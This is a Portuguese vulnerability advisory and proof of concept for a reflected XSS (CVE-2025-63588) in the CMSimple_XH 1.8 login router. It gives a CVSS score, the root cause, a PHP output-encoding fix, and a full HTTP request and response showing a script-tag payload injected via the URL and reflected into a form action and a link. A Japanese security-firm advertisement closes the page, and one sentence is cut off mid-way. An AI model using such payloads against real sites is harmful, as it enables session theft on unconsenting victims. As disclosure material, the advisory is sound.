
Prova de conceito detalhada para CVE-2025-63588, uma vulnerabilidade XSS refletida no CMSimple_XH 1.8, com pontuação CVSS, análise de impacto e exemplo de remediação de codificação segura.
Estimativa CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Médio)
CVE Atribuído: CVE-2025-63588
Produtos: CMSimple_XH - 1.8
Fornecedor: CMSimple_XH - https://www.cmsimple-xh.org/
Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido existe no código de análise do front-router do CMSimple_XH que lida com entradas dinâmicas relacionadas a login. A aplicação reflete dados controlados pelo atacante obtidos do URI da requisição diretamente no HTML gerado (por exemplo, em atributos action de formulários e hrefs de âncoras) sem a devida codificação de saída. Um atacante pode criar uma URL que, quando visitada por uma vítima, faz com que JavaScript arbitrário seja executado no navegador da vítima no contexto do site vulnerável.
Isso é um XSS refletido (não persistente); a exploração requer que uma vítima siga um link criado. O fornecedor foi informado e o problema foi documentado e atribuído ao CVE acima.
HttpOnly, os tokens de sessão podem ser roubados.A vulnerabilidade decorre do código do roteador frontal / index.php (ou controlador frontal equivalente) que analisa segmentos de caminho dinâmicos e os mapeia em variáveis de página/modelo. Fragmentos de caminho brutos (o fragmento estilo ?Templates... usado pelo roteador do CMSimple_XH) são passados para os modelos de página e injetados em atributos HTML sem a devida codificação ou sanitização de atributos HTML, permitindo que tags <script> injetadas ou outras cargas úteis sejam renderizadas literalmente. Problemas semelhantes de XSS refletido foram publicados para outros componentes web e são comumente causados pela codificação inadequada de saída de entradas não confiáveis.
Esta PoC demonstra a reflexão da entrada fornecida pelo atacante no HTML retornado, que será executada no navegador da vítima.
Requisição:
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45
login=true&keycut=z9U%21q2k%21F0&submit=Login
Resposta:
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Quando o navegador da vítima renderiza esta página, o <script>alert(1)</script> injetado é executado.

$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';
ご質問・ご相談などございましたら、お気軽にご連絡ください。

📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| 項目 | 内容 |
|---|---|
| 会社名 | 株式会社CyberCrew |
| 所在地 | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
組織の脆弱性を多角的に分析し、最適な改善策を提案します。
標的型・シナリオ型・LLMペンテスト まで対応。
機密情報の流出を早期に検知し、迅速に対応。
実践的な攻撃シナリオに基づく防御力評価を実施。
開発初期段階からセキュリティを考慮した設計を支援します。
🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — Your Trusted Security Partner.